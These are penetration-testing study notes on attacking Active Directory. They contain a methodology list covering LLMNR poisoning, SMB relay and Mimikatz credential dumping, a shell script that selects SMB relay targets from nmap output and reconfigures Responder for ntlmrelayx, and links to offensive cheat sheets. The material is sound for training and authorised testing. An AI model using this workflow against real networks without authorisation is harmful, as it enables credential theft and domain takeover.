# Attacking Active Directory

*Note: This documentation is mostly made from my notes on* [*TCM Security Academy*](https://academy.tcm-sec.com/)\
*It will be complemented with notes from my practice and from other classes like the one from* [*HTB Academy*](https://academy.hackthebox.com/)

## Methodology

* Useful tool to install on Kali: [pimpmykali](https://github.com/Dewalt-arch/pimpmykali) (choose 0 in the option menu)
* First thing to do is launch Responder (along with scans to generate traffic on the network)
* LLMNR poisoning: capture NetNTLMv2 hashes with Responder and crack them offline
* SMB relay attack: only works against hosts where SMB signing is disabled or not required, and only yields a shell if the relayed user is local admin on the target
* Look for websites in scope
* Check for default credentials (printers, Tomcat, Jenkins, ...)
* Compromise a machine (as many as possible with lateral movement)
* Enumerate the domain from the compromised host with post-compromise tooling
* Get Domain Admin with post-compromise attacks
* Dump credentials with Mimikatz
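
The Responder and SMB relay steps above depend on two checks that are easy to get wrong: which hosts actually accept unsigned SMB, and whether Responder has been told to stop answering SMB/HTTP itself so ntlmrelayx gets the sessions. The script below is an added example, not code from the TCM course or from these notes: it builds the ntlmrelayx target list from `nmap --script=smb2-security-mode` output and rewrites the Responder.conf server section for relaying. Host names, IPs and both sample inputs are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the course or the original notes): prepare an SMB relay
# from an nmap smb2-security-mode scan. All hosts and sample inputs are constructed.
set -eu

# Constructed -oN output of: nmap -p445 --script=smb2-security-mode 10.10.10.0/24
SAMPLE_NMAP_OUTPUT='Nmap scan report for dc01.lab.local (10.10.10.5)
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
Nmap scan report for ws01.lab.local (10.10.10.21)
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
Nmap scan report for 10.10.10.22
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
Nmap scan report for fs01.lab.local (10.10.10.23)
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing disabled'

# Constructed excerpt of the [Responder Core] section of Responder.conf.
SAMPLE_RESPONDER_CONF='[Responder Core]
; Servers to start
SQL = On
SMB = On
Kerberos = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On'

# Print one IP per host whose SMB signing is "not required" or "disabled".
# Hosts that require signing (domain controllers by default) cannot be relayed to
# and are skipped. Reads nmap normal (-oN) output on stdin.
relay_targets() {
  awk '
    /^Nmap scan report for/ { ip = $NF; gsub(/[()]/, "", ip) }   # "(10.10.10.5)" or bare IP
    /Message signing/ && (/not required/ || /disabled/) { print ip }
  '
}

# Rewrite Responder.conf (stdin -> stdout) with the SMB and HTTP servers turned off,
# so poisoned LLMNR/NBT-NS victims reach ntlmrelayx instead of Responder, which
# would otherwise answer them itself and only capture the hash. HTTPS is left alone.
responder_conf_for_relay() {
  sed -E 's/^(SMB|HTTP)[[:space:]]*=[[:space:]]*On[[:space:]]*$/\1 = Off/'
}

# Engagement usage (for reference, not executed here; the Responder.conf path
# depends on how Responder was installed):
#   nmap -p445 --script=smb2-security-mode -oN smb_signing.txt 10.10.10.0/24
#   relay_targets < smb_signing.txt > targets.txt
#   responder_conf_for_relay < /etc/responder/Responder.conf > Responder.conf.relay
#   sudo responder -I eth0 -wv                        # with the relay config in place
#   sudo ntlmrelayx.py -tf targets.txt -smb2support   # -i for an interactive SMB shell

# Run both helpers over the constructed samples when executed directly.
demo() {
  echo "# relay targets (signing not required):"
  printf '%s\n' "$SAMPLE_NMAP_OUTPUT" | relay_targets
  echo "# Responder.conf servers after the relay rewrite:"
  printf '%s\n' "$SAMPLE_RESPONDER_CONF" | responder_conf_for_relay | grep -E '^(SMB|HTTP|HTTPS) ='
}
demo
```

On the sample, `relay_targets` lists only `10.10.10.21` and `10.10.10.23`: the DC requires signing and the filtered host never answered the script. The scan cannot tell you the second requirement, that the account whose authentication you relay has local admin on the target; without it ntlmrelayx authenticates successfully but cannot dump SAM or execute anything.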

## Resources

{% embed url="https://wadcoms.github.io/" %}
An amazing offensive AD interactive cheat sheet by John Woodman
{% endembed %}

{% embed url="https://book.hacktricks.xyz/windows/active-directory-methodology" %}
Hacktricks - Active Directory Methodology
{% endembed %}

{% embed url="https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course" %}
TCM-Security Academy
{% endembed %}

{% embed url="https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa" %}
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher
{% endembed %}

{% embed url="https://adsecurity.org/" %}
Active Directory Security Blog
{% endembed %}

{% embed url="http://blog.harmj0y.net/" %}
Harmj0y Blog
{% endembed %}

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md" %}
Active Directory Attacks - PayloadsAllTheThings
{% endembed %}

{% embed url="https://github.com/Cloud-Architekt/AzureAD-Attack-Defense" %}
Azure AD - Attack and Defense Playbook - Cloud Architekt
{% endembed %}

{% embed url="https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet" %}
Active Directory Exploitation Cheat Sheet - Integration IT
{% endembed %}

{% embed url="https://github.com/drak3hft7/Cheat-Sheet---Active-Directory" %}
Cheat Sheet - Attack Active Directory - drak3hft7
{% endembed %}

{% embed url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" %}
Active Directory Exploitation Cheat Sheet - S1ckB0y1337
{% endembed %}

{% embed url="https://github.com/Orange-Cyberdefense/arsenal/blob/master/mindmap/pentest_ad.png" %}
Pentesting Active Directory mindmap - Orange Cyberdéfense
{% endembed %}

{% embed url="https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/" %}
Building and Attacking an Active Directory Lab with PowerShell - 1337red
{% endembed %}

{% embed url="https://github.com/Orange-Cyberdefense/GOAD" %}
GOAD (Game Of Active Directory) - Orange Cyberdéfense
{% endembed %}

{% embed url="https://adsecurity.org/?p=2362" %}
Attack Methods for Gaining Domain Admin Rights in Active Directory - Sean Metcalf - adsecurity
{% endembed %}

{% embed url="https://en.hackndo.com/" %}
hackndo - Pixis
{% endembed %}

{% embed url="https://www.thehacker.recipes/ad/" %}
The Hacker Recipes - Shutdown
{% endembed %}

{% embed url="https://dirkjanm.io/" %}
Dirk-jan Mollema's blog
{% endembed %}
